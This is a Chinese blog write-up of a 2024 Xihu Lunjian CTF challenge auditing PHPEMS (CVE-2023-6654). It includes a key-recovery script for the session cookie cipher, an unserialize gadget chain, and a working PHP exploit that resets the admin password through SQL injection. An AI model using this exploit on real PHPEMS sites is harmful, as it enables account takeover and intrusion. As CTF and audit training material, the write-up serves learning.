西湖论剑-phpems-代码审计

最新推荐文章于 2025-03-07 17:03:05 发布
原创 最新推荐文章于 2025-03-07 17:03:05 发布 · 759 阅读 · 25 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#android

0x01环境搭建

 源码

config.inc.php修改相应数据库配置

2024西湖论剑-phpems-代码审计_代码审计

数据库运行pe9.sql文件建立数据库

2024西湖论剑-phpems-代码审计_phpems_02

0x02代码审计

根据题目提示是CVE2023-6654

2024西湖论剑-phpems-代码审计_CTF_03

漏洞点在session.cls.php

查看session.cls.php代码

2024西湖论剑-phpems-代码审计_代码审计_04

查看ginkgo

2024西湖论剑-phpems-代码审计_2024西湖论剑_05

其make方法会判断$G拼接的文件名是否存在,也就是lib文件下的.cls.php文件,存在的就会包含这个文件。

pepdo,ev,pdosql,strings是这里面分别包含的文件,根据CVE披露得知是反序列化漏洞,搜索反序列化点。

2024西湖论剑-phpems-代码审计_CTF_06

strings.cls.php中有利用点

2024西湖论剑-phpems-代码审计_2024西湖论剑_07

getSessionId()方法里面有调用decode

2024西湖论剑-phpems-代码审计_phpems_08

key值为CS,CS值在config.inc.php中,题目环境是修改的

2024西湖论剑-phpems-代码审计_2024西湖论剑_09

使用如下代码可以解密出明文,因为我们知道key

2024西湖论剑-phpems-代码审计_phpems_10

<?php
define('CS','1hqfx6ticwRxtfviTp940vng!yC^QK^6');
$info="%2592%25A2%25A4%25A0%25F3%25A9%25AE%25A2%259D%2599%25C5%25DD%25E7%25D9%25DF%25D8%25C2%25D9%259DVk%25E9%25A8%259AS%25B3e%2594%25B4%257F%2596%2599b%259C%25D5%259C%25AAi%25A6%259A%2597%25AE%258B%25AC%25D7%25C9%25DB%25CF%258B%25D5%259Ei%2596%25AA%25D0%259DQ%25A9v%2580%258C%25BE%2598ok%258A%25E4%25CB%25EB%25A9%25DD%25D8%25D1%25E0%25C2%259A%25AF%25D9%25B0%25A2%258E%2592jfg%25A4%259E%2595Q%25A7t%2580%258C%25BE%2598gg%25A2%2593%25D9%25DD%25A9%25E7%25D2%25D2%25E5%25C6%25E1%25E1%25CB%25E2%25D2%25C1%25D9%25ADVk%25DF%25A8%2598X%25A9y%2597%2586%2582%258Fgf%25A3%25EE";
$key = CS;
$info = urldecode(urldecode($info));
$kl = strlen($key);
$il = strlen($info);
for($i = 0; $i < $il; $i++)
{
$p = $i%$kl;
$info[$i] = chr(ord($info[$i])-ord($key[$p]));
}
echo $info;

    2024西湖论剑-phpems-代码审计_CTF_11

    encode代码

    public function encode($info)
{
$info = serialize($info);
$key = CS;
$kl = strlen($key);
$il = strlen($info);
for($i = 0; $i < $il; $i++)
{
$p = $i%$kl;
$info[$i] = chr(ord($info[$i])+ord($key[$p]));
}
return urlencode($info);
}

decode代码

public function decode($info)
{
$key = CS;
$info = urldecode($info);
$kl = strlen($key);
$il = strlen($info);
for($i = 0; $i < $il; $i++)
{
$p = $i%$kl;
$info[$i] = chr(ord($info[$i])-ord($key[$p]));
}
$info = unserialize($info);
return $info;
}

      可以看出里面这个$p值是循环的,加密的出来的值等于其ascll值相加,

      encode是明文+key=密文

      decode是密文-key=明文

      key=密文-明文

      key的长度是32位,也就是我们得到的密码每32位一循环,那么如果我们知道密文中其中一段32位的明文,就可以算出来key了

      ev.cls.php

      2024西湖论剑-phpems-代码审计_phpems_12

      可以确认这个ip是可控的,也就是这个值是可控的

      a:3:{s:9:"sessionid";s:32:"6c48c14d623214794ccef7ee5f4b6003";s:9:"sessionip";s:9:"127.0.0.1";s:16:"sessiontimelimit";i:1706957115;}

        去掉前面的64位,往后顺延32为取出来,值如下

        :"sessionip";s:9:"127.0.0.1";s:1

          解密脚本

          <?php
$info="%2592%25A2%25A4%25A0%25F3%25A9%25AE%25A2%259D%2599%25C5%25DD%25E7%25D9%25DF%25D8%25C2%25D9%259DVk%25E9%25A8%259AS%25B3ebjfel%2596%25CD%25D7%25CA%25A8k%25D5%259F%259A%25A9%25B6%25A8%25A4%2598%25AC%2599%2589%25A5p%2596%2593%25AC%25A6%259FZ%25DBuSm%25A6nnk%258A%25E4%25CB%25EB%25A9%25DD%25D8%25D1%25E0%25C2%259A%25AF%25D9%25B0%25A2%258E%2592jfg%25A4%259E%2595Q%25A7tSm%25A6nfg%25A2%2593%25D9%25DD%25A9%25E7%25D2%25D2%25E5%25C6%25E1%25E1%25CB%25E2%25D2%25C1%25D9%25ADVk%25DF%25A8%2598X%25A9yjiiemj%25A3%25EE";
$key = CS;
$info = urldecode(urldecode($info));
$info1=substr($info,64,32);
//echo $info1;
$ed=strlen($info1);//也就是32
$dc=32;
$sessip=':"sessionip";s:9:"127.0.0.1";s:1';
for ($i=0;$i<$ed;$i++)
{
$p=$i%$dc;
$info1[$i]=chr(ord($info1[$i])-ord($sessip[$p]));
}
echo $info1;
//1hqfx6ticwRxtfviTp940vng!yC12345

构造反序列化链子

session.cls.php的__destruct() 关键代码

$sql = $this->pdosql->makeUpdate($data);
$this->db->exec($sql);

![](./myMediaFolder/media/image13.png){width="7.333333333333333in"
height="2.8976049868766403in"}

            这里可以看出分别需要db和pdosql,以此达到反序列化修改数据库密码,

            构造链子 session::__destruct()->pdosql::makeUpdate->pepdo::exec

            2024西湖论剑-phpems-代码审计_CTF_13

            0x03漏洞复现

            这里使用网上师傅的EXP

            <?php
namespace PHPEMS
{
class session
{
public function __construct()
{
$this->sessionid="1111111";
$this->pdosql= new pdosql();
$this->db= new pepdo();
}
}
class pdosql
{
private $db;
public function __construct()
{
$this->tablepre = 'x2_user set
userpassword="a10adc3949ba59abbe56e057f20f883e" where
username="peadmin";#--';
$this->db=new pepdo();
}

}
class pepdo
{
private $linkid = 0;
}
}
namespace {
define('CS1','1hqfx6ticwRxtfviTp940vng!yC12345');
function encode($info)
{
$info = serialize($info);
$key = CS1;
$kl = strlen($key);
$il = strlen($info);
for($i = 0; $i < $il; $i++)
{
$p = $i%$kl;
$info[$i] = chr(ord($info[$i])+ord($key[$p]));
}
return urlencode($info);
}
$session = new PHPEMSsession();
$array = array("sessionid"=>"123123123", $session);
echo serialize($array)."n";
echo(urlencode(encode($array)))."n";
}

              实战中我们的ip是可以伪造的

              2024西湖论剑-phpems-代码审计_CTF_14

              2024西湖论剑-phpems-代码审计_代码审计_15

              2024西湖论剑-phpems-代码审计_phpems_16

              关键代码点

              2024西湖论剑-phpems-代码审计_phpems_17

              需要先创建pepdo和pdosql

              pdosql.cls.php的makeUpdate是用来生成sql语句的

              2024西湖论剑-phpems-代码审计_代码审计_18

              $tb_pre = $this->tablepre

                所以这个sql语句参数可控

                0x04总结

                函数是关键,研究下是否能可控这个反序列化的参数值,并且反序列化中能够调用危险函数。

                网络安全学习路线

                对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

                同时每个成长路线对应的板块都有配套的视频提供:

                需要网络安全学习路线和视频教程的可以在评论区留言哦~

                最后
                • 如果你确实想自学的话,我可以把我自己整理收藏的这些教程分享给你,里面不仅有web安全,还有渗透测试等等内容,包含电子书、面试题、pdf文档、视频以及相关的课件笔记,我都已经学过了,都可以免费分享给大家!

                给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。

                黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)

                结语

                网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

                特别声明:
                此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失

                项目部署之PHPEMS在线模拟考试系统(亲测有效,含php源码)在阿里云服务器部署
                guijianchouxyz的博客
                03-20 6303
                PHPEMS在线模拟考试系统阿里云服务器部署 相信好多人都在找这个源码哈,小编也是一样,也有一个很大的梦想,就是能把我们这些英雄豪杰集中在一起,比如说这个在线考试系统就可以实现,于是小编有云服务器搭建部署一个,同时小编也会让这个平台运行一段时间,希望大家有空到平台上面做做题,留个言小编谢谢大家了 目前小编还没有在上面布置题库,大家可以现在上面注册个账号玩玩,等到小编有好的题库了,再将平台迁移到更加安全的环境上,这样大家就可以放心的玩耍了 平台功能 在线考试 课程分享 新闻发布 证书获取等等
                2024西湖论剑-数据安全-PHPEMS
                qq_35607078的博客
                02-01 1674
                2024西湖论剑-数据安全-PHPEMS
                使用PHPEMS在Windows系统上搭建考试平台的步骤
                zhawk的专栏
                06-12 1378
                搭建PHP运行环境,这里选择phpStudy2016,安装在C:\phpStudy2016 解压PHPEMS程序“phpems6.1.zip\phpems”至C:\phpStudy2016\WWW 参照“phpems6.1.zip\help\PHPEMS安装使用操作文档.docx”,导入数据库文件C:\phpStudy2016\WWW\phpems\pe6.sql 参照“phpems6.1.zip\help\PHPEMS安装使用操作文档.docx”,在“C:\phpStudy2016\WWW\phpe
                php注入点判断,PHPEMS一处SQL注入漏洞
                weixin_29837797的博客
                03-16 1228
                ### 简要描述:PHPEMS一处SQL注入漏洞### 详细说明:8.PHPEMS某处SQL注入漏洞存在注入漏洞的代码位置是/app/exam/phone.php的exercise()函数中具体存在漏洞地方位于239行附近$numbers[$p['questid']] = intval(ceil($this->exam->getQuestionNumberByQuestypeAndKn...
                phpcms 漏洞
                erjian666的博客
                11-02 3080
                这个漏洞是某司的一位前辈发出来的,这里只是复现一下而已。 原文地址:https://www.t00ls.net/thread-39226-1-1.html 首先我们本地搭建一个phpcms9.6.0的环境 下载地址:http://www.mycodes.net/43/3365.htm   点击注册页面,进行抓包 在本地创建一个txt文本,写入一句话木马 POC s...
                2024西湖论剑-phpems-代码审计
                YJ_12340的博客
                03-26 852
                系统是phpems,修改了默认密码,需要利用CVE登上去CVE-2023-6654 ,菜鸟学习,大佬多指点函数是关键,研究下是否能可控这个反序列化的参数值,并且反序列化中能够调用危险函数。
                2024西湖论剑-数据安全-PHPEMS_西湖论剑2024wp(1),2024年最新带着问题深入学习Handler
                2401_83974064的博客
                04-13 734
                phar触发点在 app/weixin/controller/index.api.php 中的file\_getcontents,其中$picurl从xml数据中获取。上传点位于 app/document/controller/fineuploader.api.php 需要注册用户,并登录。// 后缀必须为phar,否则程序无法运行。使用上面的exp我们就能把后台密码修改为123456,进入后台就能RCE,这个我们下面在写。phar生成脚本如下,上传生成的**111.gif**即可。紧接着就是找上传点了,
                2024西湖论剑数据安全PHPEMS源码包
                02-14
                "2024西湖论剑数据安全PHPEMS源码包" 提及的正是这个系统在2024年西湖论剑这一信息安全盛会上的展示或竞赛用例。西湖论剑,是中国极具影响力的信息安全年度大会,汇聚了众多顶尖的安全专家和技术爱好者,探讨和分享...
                网络安全最新2024西湖论剑-数据安全-PHPEMS_西湖论剑2024wp(1),2024年最新网络安全工程师最容易遇到4个瓶颈是什么
                2303_79055586的博客
                05-15 1041
                在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
                php网站源代码 有漏洞,PHP网站一部分源码漏洞的修改求修改思路
                weixin_39957951的博客
                03-10 339
                网站监测了一下说是存在Phpems文件上传漏洞,于是根据提示查看了一下相关的源码,可是不知该从何着手啊,求高手指教。监测的结果看截图吧:QQ截图20150327135149.jpg (44.42 KB, 下载次数: 5)2015-3-28 10:54 上传下面是源码,大神给点修改意见。public function upload(){$fn = $this->ev->get('CKEd...
                phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
                AgonYAN的博客
                07-25 3616
                phpcms v9.6.0任意文件上传漏洞(CVE-2018-14399)
                phpcms attachment.class.php,PHPCMS漏洞分析合集
                weixin_42608318的博客
                03-22 693
                本篇详细分析了 PHPCMS 的部分历史漏洞。其中多是以获取到漏洞点为场景,反向挖掘至漏洞触发入口(假设自己发现了漏洞点,模拟如何找寻整个攻击链及其入口点),旨在提高自身代码审计能力。当中包含一些网络上未公开的触发点,以及补丁对比分析与绕过。v9.6.0任意文件上传这个漏洞存在于用户注册处。这里有一个可控变量 $_POST[‘info’] 传入了 member_input 类的 get 方法中,跟...
                phpcms漏洞总结
                zhangge3663的博客
                10-14 1447
                总结表格,呈现如下: 序号 漏洞名称 补丁文件路径 补丁方案 1 phpcms某处逻辑问题导致getshell www/phpcms/libs/classes/attachment.class.php 查看详情 > 2 phpcms authkey生成算法问题导致authkey泄露 www/caches/configs/system.php 查看详情 > 3 phpcms前台注入导致任意文件读取漏洞 www/phpc
                使用PHPEMSv4.2 问题总结
                jsd2root的博客
                07-10 5042
                使用背景:个人喜欢学习各种知识,喜欢收集各种教程,喜欢与人分享技术,那么问题来了,如何更好的分享给一个刚接触某一门知识的新手呢,如何规划整理自己的学习资料呢.所以就想找一个开源的学习系统,方便自己与他人.在首先在github上查了一下,发现有些还是不错的,不过不是很适合我的需求,尝试着百度了一下,发现了PHPEMS 官方网址为:http://www.phpems.net/下面就开始折腾了,下载源码...
                传感与检测技术,Pt100热电阻测温实验报告,江南大学物联网(1)
                2401_85015014的博客
                05-16 834
                /返回 x 的系数 k 公式:k = (n sum( xy ) - sum( x ) sum( y )) / (n sum( x^2 )-sum(x) ^ 2)System.out.println(“非线性误差为:” + Math.abs(maxy/fully*100) + “%”);//返回常量系数系数 b 公式:b = sum( y ) / n - k * sum( x ) / n。System.out.println(“灵敏度为:” + Math.abs(s));//返回对应项相乘后的和。
                代码审计学习phpcms头像上传漏洞
                m0_46467017的博客
                08-16 1381
                究竟是什么原因造成了这个漏洞,究其根本还是以为你将用户不安全的POST数据写入了文件,并解压到web目录下了。世界上有无数种方法可以避免这个问题,web目录下随便写文件真的好吗?为何你不把压缩包放进tmp目录里,如果上传、解压缩的操作都能在tmp目录里完成,再把我们需要的头像文件拷贝到web目录中,还会有这么麻烦的安全问题吗?phpcms已经彻底抛弃了解压缩的方式,直接在前端将图片处理完成后进行上传。......
                phpcms头像上传漏洞以及后续影响分析
                最新发布
                a1852384503的博客
                03-07 1001
                曾经phpcms头像上传漏洞火极一时,因为互联网上大量的网站都是这个架构,导致很多网站被黑。简单来说就是phpcms对头像上传的处理方式:他先进行上传zip文件,在进行解压,在删除非图片格式的文件。这个漏洞可以来说是一个典型的逻辑型漏洞,先进行解压就让恶意用户有了可趁之机。
                2021西湖论剑中国杭州网络安全大赛技能概览
                资源摘要信息:"西湖论剑2021中国杭州网络安全技能大赛.zip" 本次提供的文件包含了2021年在中国杭州举办的“西湖论剑”网络安全技能大赛的竞赛资源,该大赛以Capture The Flag(CTF)的形式展开,针对不同领域的网络...
                评论
                添加红包

                请填写红包祝福语或标题

                红包个数最小为10个

                红包金额最低5元

                当前余额3.43前往充值 >
                需支付:10.00
                成就一亿技术人!
                领取后你会自动成为博主和红包主的粉丝 规则
                hope_wisdom
                发出的红包
                实付
                使用余额支付
                点击重新获取
                扫码支付
                钱包余额 0

                抵扣说明:

                1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
                2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

                余额充值